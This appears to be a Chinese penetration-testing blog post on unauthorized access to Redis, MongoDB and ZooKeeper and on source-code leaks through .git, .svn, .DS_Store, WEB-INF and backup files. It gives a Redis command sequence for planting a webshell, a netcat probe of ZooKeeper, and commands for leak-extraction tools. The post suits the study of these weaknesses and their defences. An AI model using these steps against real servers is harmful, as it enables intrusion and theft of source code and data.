web信息泄露

1.redis数据库任意访问 

简介

redis默认数据库端口6379,

未设置密码造成任意访问,然后使用redis权限写文件。

Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生,严重危害业务正常服务。

部分服务器上的Redis 绑定在 0.0.0.0:6379,并且没有开启认证(这是Redis 的默认配置),以及该端口可以通过公网直接访问,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,将会导致 Redis 服务直接暴露在公网上,可能造成其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

目前比较主流的案例:yam2 minerd 挖矿程序,还有在多次应急事件中发现大量的watch-smartd挖矿木马。

命令使用

info          //查看redis版本信息、一些具体信息、服务器版本信息等等:

set x "test" //将变量x的值设为test

flushall //删除数据库,谨慎使用

KEYS *  //查看所有键,redis存储数据模式为 一键一数据对应。

CONFIG GET dir //获取默认的redis目录

CONFIG GET dbfilename//获取默认的rdb文件名

往web物理路径写webshell

redis远程连接   redis-cli -h xx.xx.xx.xx

redis本地打开   redis-cli

redis服务打开   redis-server

当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell

执行以下命令

192.168.63.xx:6379> config set dir /var/www/html/

    OK

192.168.63.xx:6379> config set dbfilename shell.php

    OK

192.168.63.xx:6379> set x ""

    OK

192.168.63.xx:6379> save

    OK

2.mongodb数据库任意访问

简介

mongodb默认数据库端口为27017

开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增删改高危动作)而且可以远程访问数据库

在刚安装完毕的时候MongoDB都默认有一个admin数据库,此时admin数据库是空的,没有记录权限相关的信息!当admin.system.users一个用户都没有时,即使mongod启动时添加了—auth参数,如果没有在admin数据库中添加用户,此时不进行任何认证还是可以做任何操作(不管是否是以—auth 参数启动),直到在admin.system.users中添加了一个用户。加固的核心是只有在admin.system.users中添加用户之后,mongodb的认证,授权服务才能生效

命令使用

远程连接 mongodb ip

    root@xiaozhupeiqi:~# mongo xxx.xx.xx.xx

    MongoDB shell version: 2.6.10

    connecting to: xx.xx.xx.xx/test

    Server has startup warnings:

    2018-10-19T14:47:46.342+0800 I CONTROL  [initandlisten] ** WARNING: You are running this process as the root user, which is not recommended.

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten]

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten]

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is     'always'.

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten] **        We suggest setting it to 'never'

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten]

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/defrag is 'always'.

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten] **        We suggest setting it to 'never'

    2018-10-19T14:47:46.343+0800 I CONTROL  [initandlisten]

利用sql语句

show databases;

use admin;

show tables;

等命令

或者

show dbs;                  #查看全部数据库

show collections;          #显示当前数据库中的集合(类似关系数据库中的表)

show users;                #查看当前数据库的用户信息

use dbname;             #切换数据库跟mysql一样

显示db状态

    db.stats()

    {

            "db" : "admin",

            "collections" : 3,

            "objects" : 5,

"avgObjSize" : 217.4,

"dataSize" : 1087,

"storageSize" : 69632,

            "numExtents" : 0,

"indexes" : 5,

"indexSize" : 122880,

"ok" : 1

    }

3.ZooKeeper未授权访问

简介

Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。

漏洞利用

执行以下命令即可远程获取该服务器的环境:

echo envi | nc xx.xx.xx.xx 2181

    zookeeper.version=3.4.10-39d3a4f269333c922ed3db283be479f9deacaa0f, built on 03/23/2017 10:13 GMT

    host.name=AY1304161249343xxxxx

    java.version=1.8.0_171

    java.vendor=Oracle Corporation

    java.home=/usr/local/java/jdk1.8.0_171/jre

    java.class.path=/data/zookeeper-3.4.10/bin/../build/classes:/data/zookeeper-3.4.10/bin/../build/lib/*.jar:/data/zookeeper-3.4.10/bin/../lib/slf4j-log4j12-1.6.1.jar:/data/zookeeper-3.4.10/bin/../lib/slf4j-api-1.6.1.jar:/data/zookeeper-3.4.10/bin/../lib/netty-3.10.5.Final.jar:/data/zookeeper-3.4.10/bin/../lib/log4j-1.2.16.jar:/data/zookeeper-3.4.10/bin/../lib/jline-0.9.94.jar:/data/zookeeper-3.4.10/bin/../zookeeper-3.4.10.jar:/data/zookeeper-3.4.10/bin/../src/java/lib/*.jar:/data/zookeeper-3.4.10/bin/../conf:.:/usr/local/java/jdk1.8.0_171/lib:/usr/local/java/jdk1.8.0_171/jre/lib:.:$JAVA_HOME/lib:$JAVA_HOME/jre/lib

    java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib

    java.io.tmpdir=/tmp

    java.compiler=<NA>

    os.name=Linux

    os.arch=amd64

    os.version=3.2.0-29-generic

    user.name=root

    user.home=/root

    user.dir=/data/zookeeper-3.4.10

防护

    1、禁止把Zookeeper直接暴露在公网

    2、添加访问控制,根据情况选择对应方式(认证用户,用户名密码)

    3、绑定指定IP访问

4.源码泄露篇

.hg源码泄漏 

hg init的时候会生成.hg

工具:https://github.com/kost/dvcs-ripper

命令:rip-hg.pl -v -u http://www.example.com/.hg/

.git源码泄露

原理:在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了。使用这个文件,可以用来恢复源代码。

工具:https://github.com/lijiejie/GitHack

命令:python GitHack.py http://www.example.com/.git/

 .DS_Store文件泄漏

原理:在发布代码时未删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息。

工具:https://github.com/lijiejie/ds_store_exp

命令:python ds_store_exp.py http://www.example.com/.DS_Store

.SVN导致文件泄露 

原理:SVN产生的.svn目录下还包含了以.svn-base结尾的源代码文件副本(低版本SVN具体路径为text-base目录,高版本SVN为pristine目录),如果服务器没有对此类后缀做解析,黑客则可以直接获得文件源代码。

在被利用的网址后面加 /.svn/entries,列出网站目录,甚至下载整站。

工具: https://www.waitalone.cn/seay-svn-poc-donw-20140505.html

命令:.exe文件傻瓜式操作粘贴 www.xxx.xx/.svn/entries

.bzr源码泄露

bzr也是个版本控制工具, 虽然不是很热门, 但它也是多平台支持, 并且有不错的图形界面,所以也有一些人认为bzr比git要好用。

原理:bzr在初始化项目时(bzr init/init-repo), 会在项目根目录产生名为.bzr的隐藏目录, 同样暴露了源代码和用户信息.

工具:https://github.com/kost/dvcs-ripper

命令:rip-bzr.pl -v -u http://www.example.com/.bzr/

.cvs源码泄露

原理:CVS是一个年代比较久远的版本控制系统, 通过它可以追踪源代码的历史变化记录,但是因为功能比较简单, 而且不支持分支, 所以很早前就被上面提到的svn替代了。cvs项目在初始化(cvs checkout project)的时候, 会在project目录下创建一个名为CVS的目录,

其中保存了各个文件的修改和commit记录. 通过此目录可以获取代码的历史版本. 其中两个关键文件为:

CVS/Root和CVS/Entries, 分别记录了项目的根信息和所有文件的结构。

工具: https://github.com/kost/dvcs-ripper

WEB-INF/web.xml泄露 

WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。

WEB-INF主要包含一下文件或目录:

    /WEB-INF/web.xml

    :Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。

    /WEB-INF/classes/

    :含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中

    /WEB-INF/lib/

    :存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件

    /WEB-INF/src/

    :源码目录,按照包名结构放置各个java文件。

    /WEB-INF/database.properties

    :数据库配置文件

原理:通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。

漏洞检测以及利用方法:

通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。

一般情况,jsp引擎默认都是禁止访问WEB-INF目录的,Nginx 配合Tomcat做均衡负载或集群等情况时,问题原因其实很简单,Nginx不会去考虑配置其他类型引擎(Nginx不是jsp引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改Nginx配置文件禁止访问WEB-INF目录就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!

利用:通过web.xml文件推测应用组件相关类的名字, 然后在src目录下查找代码, 如果没有源代码可以直接下载class文件反编译即可

## 网站备份文件泄露 ##

原理:在网站的使用过程中,往往需要对网站中的文件进行修改、升级。此时就需要对网站整站或者其中某一页面进行备份。当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站web目录下,而该目录又没有设置访问权限时,便有可能导致备份文件或者编辑器的缓存文件被下载,导致敏感信息泄露,给服务器的安全埋下隐患。

.rar .zip .7z .tar.gz .bak .swp .txt

---

参考:

https://www.secpulse.com/archives/61101.html

http://www.hacksec.cn/Penetration-test/474.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 219,270评论 6 508
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,489评论 3 395
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 165,630评论 0 356
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,906评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,928评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,718评论 1 305
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,442评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,345评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,802评论 1 317
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,984评论 3 337
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,117评论 1 351
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,810评论 5 346
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,462评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,011评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,139评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,377评论 3 373
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,060评论 2 355

推荐阅读更多精彩内容

  • SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务...
    Seaer阅读 1,592评论 0 3
  • 摘要:本文从一起漏洞应急响应案例介绍了:如何在极短的时间内通过阿里云云盾产品Web应用防火墙WAF制作虚拟补丁,临...
    肆虐的悲傷阅读 991评论 0 0
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,667评论 18 139
  • 随着公众对Web安全的聚焦,越来越多的行业领域如运营商、政府电子政务互动平台、企事业门户网站及教育医疗机构等都已经...
    James黄杰阅读 1,691评论 0 0
  • 夜跑,不是作秀 而是为了让自己身体的每个细胞老的慢一点。 承认岁月是把杀猪刀 但在容颜慢慢变老的将来 能把握好眼下...
    焆梓阅读 1,053评论 2 6